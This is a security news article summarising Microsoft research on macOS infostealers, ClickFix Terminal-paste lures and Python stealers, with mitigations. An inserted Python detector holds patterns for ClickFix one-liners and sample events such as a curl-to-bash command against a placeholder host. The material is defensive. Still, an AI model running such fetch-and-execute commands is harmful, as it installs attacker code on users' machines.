PROBABLYPWNED
Malware | February 18, 2026 | 4 min read

Microsoft: macOS Infostealers Surge With ClickFix and Python

Microsoft Defender Experts track expanding infostealer campaigns hitting macOS via ClickFix prompts, malicious DMG installers, and Python-based stealers. DigitStealer, MacSync, and AMOS lead the wave.

James Rivera

Microsoft Defender Experts published research this month warning that infostealer malware is aggressively expanding beyond Windows to target macOS environments. The campaigns use ClickFix-style social engineering, malicious DMG installers, and cross-platform Python stealers to harvest credentials, browser data, and cryptocurrency wallets from Apple users.

The shift matters because macOS has historically faced fewer commodity malware threats. That's changing fast.

The macOS Infostealer Landscape

Microsoft's analysis identifies several active malware families targeting Apple systems:

DigitStealer is a JavaScript for Automation (JXA)-based stealer first documented by Jamf Threat Labs in November 2025. It targets 18 cryptocurrency wallets, browser profiles, and macOS keychain data, with particular focus on Apple Silicon devices. Distribution occurs through disk images masquerading as legitimate utilities.

MacSync represents a more sophisticated threat that bypasses Gatekeeper protections through unsigned code loaded into trusted processes. The stealer harvests browser credentials, keychain entries, and cryptocurrency wallet files.

Atomic macOS Stealer (AMOS) continues operating as a malware-as-a-service offering. For $1,000/month, criminals get a turnkey solution for extracting passwords, cookies, and crypto assets from Mac victims. AMOS was behind multiple OpenClaw-related campaigns we've covered recently.

ClickFix Comes to macOS

The ClickFix technique—tricking users into executing malicious commands through fake error messages—has proven devastatingly effective against Windows users. Now it's adapted for macOS.

Microsoft observed campaigns where victims encounter fake verification prompts claiming camera or display configuration issues. The "solution" involves copying a command and pasting it into Terminal. Unlike Windows where PowerShell executes the payload, macOS victims run bash or Python scripts that install stealer components.

The approach works because macOS users aren't conditioned to distrust Terminal commands the way Windows users have (somewhat) learned to question PowerShell prompts. Apple's walled garden reputation creates false confidence that persists even when users manually execute malicious code.

Cross-Platform Python Stealers

A parallel trend involves Python-based stealers that run on any system with a Python interpreter. These tools often target developer machines—environments where Python is guaranteed to exist and where valuable credentials (API keys, cloud access tokens, source code) concentrate.

The Python stealers bypass platform-specific defenses by operating at the interpreter level. They're delivered through trojanized development tools, malicious pip packages, and supply chain compromises affecting npm and PyPI repositories.

Attack Chain Analysis

A typical macOS infostealer infection follows this pattern:

  1. Initial lure - Victim downloads a DMG file advertised as cracked software, a utility, or a job-related coding test
  2. Execution prompt - The DMG contains an application that requests Terminal execution or displays ClickFix-style prompts
  3. Gatekeeper bypass - Various techniques suppress or circumvent Apple's code signing verification
  4. In-memory execution - Malicious components load without touching disk, avoiding detection
  5. Data harvesting - Stealer enumerates browser profiles, keychain entries, and cryptocurrency wallet paths
  6. Exfiltration - Stolen data transmits to attacker C2 infrastructure

The infection chain exploits user trust rather than software vulnerabilities. Every step requires victim cooperation, but social engineering makes that cooperation routine.
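As an added example (not code from the article or from Microsoft's research), the detection logic below runs over constructed process-event lines and flags the Terminal-spawned curl, base64 and Python one-liners that the ClickFix section and steps 2 to 4 of the chain above describe; the event format, indicator names and sample lines are assumptions of this example.

```python
# Added example (not the article's or Microsoft's code): toy ClickFix chain
# detector over constructed "parent<TAB>process<TAB>cmdline" event lines, the
# shape an EDR export might give. Indicator lists and names are this example's own.
import re

# Apps a user pastes into (hypothetical list for this example).
PASTE_PARENTS = {"Terminal", "iTerm2"}
# Interpreters a ClickFix lure tells the victim to run the pasted text in.
INTERPRETERS = {"bash", "sh", "zsh", "python", "python3", "osascript"}

# (regex, indicator name): signs that the one-liner stages a payload.
INDICATORS = [
    (r"\bcurl\b[^|]*\|\s*(bash|sh|zsh|python3?)\b", "curl piped into an interpreter"),
    (r"\bbase64\s+(-d|-D|--decode)\b", "decodes an embedded payload"),
    (r"\bpython3?\s+-c\s", "python one-liner"),
    (r"\bosascript\s+-e\s", "inline AppleScript/JXA"),
]

def parse_line(line: str) -> tuple[str, str, str]:
    """Split one 'parent<TAB>process<TAB>cmdline' event line (cmdline may contain tabs)."""
    parent, process, cmdline = line.rstrip("\n").split("\t", 2)
    return parent, process, cmdline

def match_indicators(parent: str, process: str, cmdline: str) -> list[str]:
    """Indicator names hit by one event; [] means it is not ClickFix-shaped."""
    if parent not in PASTE_PARENTS or process not in INTERPRETERS:
        return []
    return [name for pat, name in INDICATORS if re.search(pat, cmdline)]

def find_suspicious(lines) -> list[tuple[str, list[str]]]:
    """Return (cmdline, indicators) for each event that hits at least one indicator."""
    hits = []
    for line in lines:
        parent, process, cmdline = parse_line(line)
        names = match_indicators(parent, process, cmdline)
        if names:
            hits.append((cmdline, names))
    return hits

# Constructed sample events: no real hosts or payloads.
SAMPLE_EVENTS = [
    "Terminal\tbash\tbash -c 'curl -fsSL http://example.invalid/fix.sh | bash'",
    "Terminal\tsh\tsh -c 'echo <PLACEHOLDER> | base64 -d | sh'",
    "Terminal\tpython3\tpython3 -m pytest tests/",
    "launchd\tbash\tbash -c 'curl -s http://example.invalid/x | bash'",  # not user-pasted
]

if __name__ == "__main__":
    for cmdline, names in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT: {cmdline!r} -> {', '.join(names)}")
```

The last sample line is deliberately skipped: a curl-to-shell chain under launchd is worth its own rule, but it is not the user-pasted ClickFix shape this detector is scoped to.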

Who's at Risk

Cryptocurrency holders face the highest risk. Every macOS stealer Microsoft analyzed prioritizes wallet extraction. Browser credentials rank second—valuable for account takeover but less immediately monetizable.

Developers represent a secondary target category. Their machines contain API tokens, cloud credentials, and access to source code repositories. A single compromised developer can cascade into organization-wide supply chain attacks.

Home users who believe "Macs don't get viruses" remain the softest targets. The myth persists despite years of evidence to the contrary, and attackers exploit this misconception through social engineering that wouldn't work against more security-aware populations.

Defensive Measures

Microsoft's research suggests practical mitigations:

  1. Never paste commands from websites into Terminal - This is 2026's equivalent of enabling macros in Word documents
  2. Verify DMG sources - Legitimate software comes from official sources, not download aggregators
  3. Enable Gatekeeper strictly - Don't disable security features for "convenience"
  4. Review browser extension permissions - Stealers often arrive through malicious browser extensions
  5. Use hardware wallets - Keep significant cryptocurrency holdings off internet-connected devices

The broader lesson is that platform security doesn't protect against social engineering. macOS may have fewer remote exploits than Windows, but that advantage disappears when users willingly execute malicious code. As infostealers evolve to target AI agent configurations, the attack surface continues expanding regardless of operating system.
